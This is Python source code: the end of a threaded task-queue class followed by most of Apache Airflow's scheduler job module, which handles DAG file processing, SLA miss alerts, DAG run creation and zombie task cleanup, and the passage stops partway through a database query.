for _r in range(0, self.thread_count):
t = threading.Thread(target=self._task_queue_func)
self.task_queue_threads.append(t)
t.start()
def _task_queue_func(self) -> None:
while True:
task = self.task_queue.get()
if task is None:
return
try:
task()
except BaseException as e:
_logger.exception("Unhandled exception running task")
self.error = e
finally:
with self.lock:
self.in_flight -= 1
def add(
self,
task: Callable[[], None],
unlock: Optional[threading.Condition] = None,
check_done: Optional[threading.Event] = None,
) -> None:
"""
Add your task to the queue.
The optional unlock will be released prior to attempting to add the
task to the queue.
If the optional "check_done" threading.Event's flag is set, then we
will skip adding this task to the queue.
If the TaskQueue was created with thread_count == 0 then your task will
be synchronously executed.
"""
if self.thread_count == 0:
task()
return
with self.lock:
self.in_flight += 1
while True:
try:
if unlock is not None:
unlock.release()
if check_done is not None and check_done.is_set():
with self.lock:
self.in_flight -= 1
return
self.task_queue.put(task, block=True, timeout=3)
return
except queue.Full:
pass
finally:
if unlock is not None:
unlock.acquire()
def drain(self) -> None:
"""Drain the queue."""
try:
while not self.task_queue.empty():
self.task_queue.get(True, 0.1)
except queue.Empty:
pass
def join(self) -> None:
"""Wait for all threads to complete."""
for _t in self.task_queue_threads:
self.task_queue.put(None)
for t in self.task_queue_threads:
t.join()
|
scheduler_job.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout
from datetime import timedelta
from itertools import groupby
from typing import List, Set
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.local_executor import LocalExecutor
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagrun import DagRun
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKeyType
from airflow.stats import Stats
from airflow.ti_deps.dep_context import DepContext
from airflow.ti_deps.dependencies import SCHEDULED_DEPS
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessorProcess, DagFileProcessorAgent, SimpleDag, SimpleDagBag,
)
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.session import provide_session
from airflow.utils.state import State
from airflow.utils.types import DagRunType
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: List[str]
:param zombies: zombie task instances to kill
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
self._file_path = file_path
# The process that was launched to process the given .
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel = None
self._result_queue = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param zombies: zombie task instances to kill
:type zombies: list[airflow.models.taskinstance.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)),\
redirect_stderr(StreamLogWriter(log, logging.WARN)):
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_id_white_list, log=log)
result = dag_file_processor.process_file(
file_path=file_path,
zombies=zombies,
pickle_dags=pickle_dags
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids, log):
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
TI = models.TaskInstance
qry = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis: # pylint: disable=too-many-nested-blocks
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas: # pylint: disable=too-many-nested-blocks
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
# pylint: disable=too-many-return-statements,too-many-branches
@provide_session
def create_dag_run(self, dag, dag_runs=None, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
# pylint: disable=too-many-nested-blocks
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
if dag_runs is None:
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
else:
active_runs = [
dag_run
for dag_run in dag_runs
if not dag_run.external_trigger
]
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return None
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return None
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRunType.SCHEDULED.value + '%')
)
)
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return None
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return None
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return None
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRunType.SCHEDULED.value + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
return None
@provide_session
def _process_task_instances(
self, dag: DAG, dag_runs: List[DagRun], session=None
) -> List[TaskInstanceKeyType]:
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
active_dag_runs = 0
task_instances_list = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if active_dag_runs >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag # type: ignore
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
active_dag_runs += 1
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
return task_instances_list
@provide_session
def _process_dags(self, dags: List[DAG], session=None):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs (if CHECK_SLAS config enabled).
:param dags: the DAGs from the DagBag to process
:type dags: List[airflow.models.DAG]
:rtype: list[TaskInstance]
:return: A list of generated TaskInstance objects
"""
check_slas = conf.getboolean('core', 'CHECK_SLAS', fallback=True)
# pylint: disable=too-many-nested-blocks
tis_out: List[TaskInstanceKeyType] = []
dag_ids = [dag.dag_id for dag in dags]
dag_runs = DagRun.find(dag_id=dag_ids, state=State.RUNNING, session=session)
# As per the docs of groupby (https://docs.python.org/3/library/itertools.html#itertools.groupby)
# we need to use `list()` otherwise the result will be wrong/incomplete
dag_runs_by_dag_id = {k: list(v) for k, v in groupby(dag_runs, lambda d: d.dag_id)}
for dag in dags:
dag_id = dag.dag_id
self.log.info("Processing %s", dag_id)
dag_runs_for_dag = dag_runs_by_dag_id.get(dag_id) or []
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
if not dag.is_subdag:
dag_run = self.create_dag_run(dag, dag_runs=dag_runs_for_dag)
if dag_run:
dag_runs_for_dag.append(dag_run)
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
if dag_runs_for_dag:
tis_out.extend(self._process_task_instances(dag, dag_runs_for_dag))
if check_slas:
self.manage_slas(dag)
return tis_out
def _find_dags_to_process(self, dags: List[DAG], paused_dag_ids: Set[str]) -> List[DAG]:
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:param paused_dag_ids: paused DAG IDs
:return: DAGs to process
"""
if len(self.dag_ids) > 0:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dags
if dag.dag_id not in paused_dag_ids]
return dags
@provide_session
def kill_zombies(self, dagbag, zombies, session=None):
"""
Fail given zombie tasks, which are tasks that haven't
had a heartbeat for too long, in the current DagBag.
:param zombies: zombie task instances to kill.
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
:param session: DB session.
"""
TI = models.TaskInstance
for zombie in zombies:
if zombie.dag_id in dagbag.dags:
dag = dagbag.dags[zombie.dag_id]
if zombie.task_id in dag.task_ids:
task = dag.get_task(zombie.task_id)
ti = TI(task, zombie.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = zombie.start_date
ti.end_date = zombie.end_date
ti.try_number = zombie.try_number
ti.state = zombie.state
ti.test_mode = self.UNIT_TEST_MODE
ti.handle_failure("{} detected as zombie".format(ti),
ti.test_mode, ti.get_template_context())
self.log.info('Marked zombie job %s as %s', ti, ti.state)
Stats.incr('zombies_killed')
session.commit()
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param zombies: zombie task instances to kill.
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: List[airflow.utils.dag_processing.SimpleDagBag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
dagbag.sync_to_db()
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id, dag in dagbag.dags.items():
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
dags = self._find_dags_to_process(dagbag.dags.values(), paused_dag_ids)
ti_keys_to_schedule = self._process_dags(dags, session)
# Refresh all task instances that will be scheduled
TI = models.TaskInstance
filter_for_tis = TI.filter_for_tis(ti_keys_to_schedule)
refreshed_tis = []
if filter_for_tis is not None:
refreshed_tis = session.query(TI).filter(filter_for_tis).with_for_update().all()
for ti in refreshed_tis:
# Add task to task instance
dag = dagbag.dags[ti.key[0]]
ti.task = dag.get_task(ti.key[1])
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True
):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
try:
self.kill_zombies(dagbag, zombies)
except Exception: # pylint: disable=broad-except
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
self.using_mysql = False
if conf.get('core', 'sql_alchemy_conn').lower().startswith('sqlite'):
self.using_sqlite = True
if conf.get('core', 'sql_alchemy_conn').lower().startswith('mysql'):
self.using_mysql = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
def register_exit_signals(self):
"""
Register signals that stop child processes
"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame): # pylint: disable=unused-argument
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None))) # pylint: disable=no-member
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state}, synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:return: list[airflow.models.TaskInstance]
"""
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
task_instances_to_examine = (
session
.query(TI)
